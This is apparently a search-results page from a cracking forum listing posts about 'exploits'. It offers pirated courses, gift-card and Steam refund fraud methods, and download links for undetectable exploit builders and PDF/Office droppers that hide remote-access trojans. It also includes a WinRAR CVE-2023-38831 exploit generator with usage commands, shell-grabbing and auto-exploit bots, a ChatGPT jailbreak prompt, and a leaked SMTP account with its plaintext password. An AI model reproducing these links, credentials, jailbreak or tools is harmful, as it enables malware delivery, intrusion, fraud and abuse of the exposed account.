Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  1. tronny

    Udemy - Exploit Development for Linux (x64) - 2022, by Srinivas

    Udemy - Exploit Development for Linux (x64) - 2022, by Srinivas *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  2. tronny

    Udemy - Exploit Development for Linux (x86) - 2021, by Srinivas

    Udemy - Exploit Development for Linux (x86) - 2021, by Srinivas *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  3. tronny

    OffSec - EXP-100 Exploit Development Essentials 2023

    OffSec - EXP-100 Exploit Development Essentials 2023 *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  4. tronny

    SANS - SEC760 - Advanced Exploit Development for Penetration Testers

    SANS - SEC760 - Advanced Exploit Development for Penetration Testers *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! *** Use terabox app in ur android mobile. Then open welfare center, then select daily benefits and watch video. after watching...
  5. tronny

    SANS - SEC710 - Advanced Exploit Development

    SANS - SEC710 - Advanced Exploit Development *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! *** Use terabox app in ur android mobile. Then open welfare center, then select daily benefits and watch video. after watching video u will get...
  6. tronny

    SANS - SEC660 - Advanced Penetration Testing, Exploit Writing

    SANS - SEC660 - Advanced Penetration Testing, Exploit Writing, and Ethical Hacking *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! *** Use terabox app in ur android mobile. Then open welfare center, then select daily benefits and watch video...
  7. Charlie Brown

    GIFTCARDS EXPLOIT 💰💰💰 NEW!

    https://www.mediafire.com/file/ih4zy1dlyku0tzy/G2A_Giftcard_Method.pdf/file
  8. Charlie Brown

    GIFTCARDS EXPLOIT 💰💰💰 NEW!

    https://www.mediafire.com/file/ih4zy1dlyku0tzy/G2A_Giftcard_Method.pdf/file
  9. Charlie Brown

    GIFTCARDS EXPLOIT 💰💰💰 NEW!

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  10. Charlie Brown

    GIFTCARDS EXPLOIT 💰💰💰 NEW!

    https://www.mediafire.com/file/ih4zy1dlyku0tzy/G2A_Giftcard_Method.pdf/file
  11. Charlie Brown

    Method/TUT  GIFTCARDS EXPLOIT 💰💰💰 NEW!

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  12. Charlie Brown

    Method/TUT  GIFTCARDS EXPLOIT 💰💰💰 NEW!

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  13. Charlie Brown

    Method/Tut  GIFTCARDS EXPLOIT 💰💰💰 NEW!

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  14. Charlie Brown

    Others  GIFTCARDS EXPLOIT 💰💰💰 NEW!

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  15. Charlie Brown

    HTTP/s  GIFTCARDS EXPLOIT 💰💰💰 NEW!

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  16. Charlie Brown

    Method/Tut  GIFTCARDS EXPLOIT 💰💰💰 NEW!

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  17. tronny

    Udemy - Exploit Development Tutorial for Hackers and Pentesters

    Udemy - Exploit Development Tutorial for Hackers and Pentesters, by Swapnil Singh *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! *** Use terabox app in ur android mobile. Then open welfare center, then select daily benefits and watch video...
  18. thirtiethawk

    SILENT PDF EXPLOIT CVE-2023 BY EXONIAA

    The exploit allows you to convert EXE to .PDF file its coded 100% from scratch and used by private methods to assure a great stability and long lasting FUD time. You are able to attach it to all email providers and now a days everyone uses Adobe Reader or PDF Reader so it gives a huge chance of...
  19. mariottide

    winrar exploit generator

    CVE-2023-38831 winrar exploit generator Generate the default poc for test python cve-2023-38831-exp-gen.py poc or python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum...
  20. tronny

    Udemy - Reverse Engineering and Exploit Development, by Infinite Skills

    Udemy - Reverse Engineering and Exploit Development, by Infinite Skills *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  21. tronny

    Udemy - Reverse Engineering and Exploit development in ARM, by Ajin Deepak

    Udemy - Reverse Engineering and Exploit development in ARM, by Ajin Deepak *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  22. jain

    Course/Tutorial  #offsec | EXP-301: Windows User Mode Exploit Devolopment PDF+VIDEOS

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  23. jinxwoo13

    Bot  Violent Exploit Tool

    Download Link : https://dropden.com/723821fb8a7f Tool for Grabbing Shells, Cpanels, and SMTPs PS : Use RDP at your own RISK!!!
  24. xpert techy

    Multi Exploit Builder V1 Download [ FUD ] Fully Undetectable

    It is an advanced program that takes advantage of a software vulnerability or security flaw. This program is used by security researchers as a proof of concept threat or by malicious actors for use in their operations. Explit Builder is such a fantastic tool that has the ability to exploit...
  25. FS420

    Method/Tut  FS420 ✅ STEAM FREE DRM GAMES REFUND EXPLOIT ✅ WORKING 2023 ✅

    FS420 ✅ STEAM FREE DRM GAMES REFUND EXPLOIT ✅ WORKING 2023 ✅ PRESS "LIKE" AND "REPLY" TO UNLOCK CONTENT *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  26. isjssjdjdj

    Multi exploit builder v1

    Download https://fullcrypters.net/multi-exploit-builder-v1/
  27. BADREDDINE

    winrar exploit CVE 2023-38831 tool

    Generate the default poc for test Place the bait file and (evil) script file in the current directory, the bait file is recommended to be an image (.png, jpg) or a document (.pdf) Output RAR File: Give it a suitable name Then press " Generate Exploit. Infected version: winrar <= 6.22...
  28. omegahunter

    Trillium Multi exploit

    Privilège: https://www.swisstransfer.com/d/1c2c7f30-23a6-489b-a556-03ce82063712 [RÉPONDRE] [/RÉPONDRE]
  29. omegahunter

    PDF EXPLOIT EXE

    Privilège: https://www.swisstransfer.com/d/1b8c8e99-d2b1-4f3a-9e93-06adda6f9f7c [RÉPONDRE] [/RÉPONDRE] Cacher un pdf dans un exe MDP : adrikadi
  30. omegahunter

    silent Exploit exe dans doc fud

    Privilège: https://www.swisstransfer.com/d/a73e0140-bddc-48d8-bb5e-de31a19ca97b [RÉPONDRE] [/RÉPONDRE]
  31. B

    Sender  Exploit SMTP 2 SMS V1.5

    Link: https://www.mediafire.com/folder/4ruohrzf2dzhr/ExploitSMTPSMS *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  32. B

    Checker  HORNET SPIDER Exploit

    https://www.mediafire.com/folder/wgl0r4dhwyj9q/HORNETSPIDERExploit
  33. zieoijod

    Cloudpanel 0-day Exploit

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  34. tronny

    EXP301 OSED Exploit Development PDF + Video 2021

    EXP301 OSED Exploit Development PDF + Video 2021 *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  35. MAZTOL_BAW

    Exploit WinRaR [ CVE-2023-38831 ]

    Hello members: Today we have a way to hack using a vulnerability: CVE-2023-38831 WinRAR: You can search more about the vulnerability via cve search: The problem, guys, is that the video is in Arabic, but you can understand the method because it is easy if you are used to making malicious...
  36. k0ur0sh3r

    Source Code  exploit YITH WooCommerce Gift Cards 3.20.0

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! *** download
  37. yharo01

    Free smtp from exploit larv 1x

    URL: http://2.56.60.92/.env MAILHOST: mail.fenomentahmin.com MAILPORT: 587 MAILUSER: [email protected] MAILPASS: ZTs2pCV(fB7- MAILFROM: [email protected]
  38. JrSoundCar

    Multi Exploit Builder V1

    Multi Exploit Builder V1 Tools~ UAC Exploit Download and Execute Exploit Windows Shortcut EXploit UAC Exploit Using Vbs script Using Reg UAC Enable Using Reg File Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  39. Mr.Milk9000

    SQLi/Dork  Roblox exploit for you little piggies

    https://github.com/topics/synapse-x-cracked
  40. ~SAMURAI~

    Logs  LATEST OFFENSIVE SECURITY OSMR / EXP-312 APPLE MACOS EXPLOIT

    EXP-312: Advanced macOS Control Bypasses OSMR Certification Advanced macOS Control Bypasses (EXP-312) is our first macOS security course. It’s an offensive logical exploit development course for macOS, focusing on local privilege escalation and bypassing the operating system’s defenses...
  41. xxx31fr

    Script/Site  Advanced bot to exploit wordpress site

    Hello, I share you a new script by Codeb0ss the name Advanced bot to exploit wordpress site As usual, run it en windows with python 2.7+ here the screenshot Here the file: https://anonymfile.com/VLp3q/xtreme1377bot.zip Enjoy
  42. R

    Bug  Windows 11 10.0.22000 - Backup service Privilege Escalation

    ## Software: https://www.microsoft.com/en-us/software-download/windows11 ## Description: Windows 11 Pro build 10.0.22000 Build 22000 suffers from Backup service - Privilege Escalation vulnerability. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. and...
  43. xxx31fr

    Script/Site  Apache HTTP Server Bot - Auto Exploit - by Codeb0ss

    Hello, I share you another script from Codeb0ss: "Apache HTTP Server Bot - Auto Exploit" from Codeb0ss As usual, you must run it on Windows with Python 2.7+ Here the screen: Here the file to download : https://anonymfile.com/rpZ4A/apachehttp-exp.zip Enjoy
  44. hofnar05

    PREDATOR (MULTI HACKING TOOL) From now on WE ALL CAN BE H@CKERS 12 Aug 2023

    CREATED BY HOFNAR05 TEAM ✅ OUT NOW (12 Aug - 2023 - Predator v0.0.3) ———————— PREDATOR ———————— From now on WE ALL CAN BE H@CKERS.. ———————————— GUI interface, many options, designed to be easy for everyone.. Now even my little brother can become a Hacker.. No more having to install...
  45. A

    FUD Silent Office Exploit Builder Private Edition bypass Gmail scan

    Link: https://www.upload.ee/files/15563559/Silent_Office_Exploit_Builder_Private_Edition.7z.html
  46. mtgox176

    Multi/Others  Multi Exploit Builder | Shortcut exploit and many more...

    Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  47. HackFun

    PDF Exploit Builder

    Hi all, After several months of research I finally found a software that encrypts R.A.T / server / virus in PDFs. It exploits a flaw in PDF that allows a server to run in the background when the user opens the PDF. I share it with you because I have been looking for this Exploit for a long time...
  48. KarmaCrew

    ChatGPT Aim Mode Exploit

    This Prompt is an exploit for ChatGPT that put's it into AIM Mode, AIM is an unfiltered and amoral chatbot.
  49. zelaxsus

    Shell  Web Shell Exploits

    Link: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  50. V

    SQLi/Dork  psqli is a good tool for sqli exploit and take over database

    Download: https://github.com/lehongphong08/psqli-pro Fitur singgle site injection Mass Xploit sql-injection aUTO DorKiNg + AutO Xploit SQLi Base64 injection SQLi POST method SQLi ERROR Based method scan site + auto inject ( web crawler ) Reverse ip vuln sqli + auto inject Query Email Pass...
Top Bottom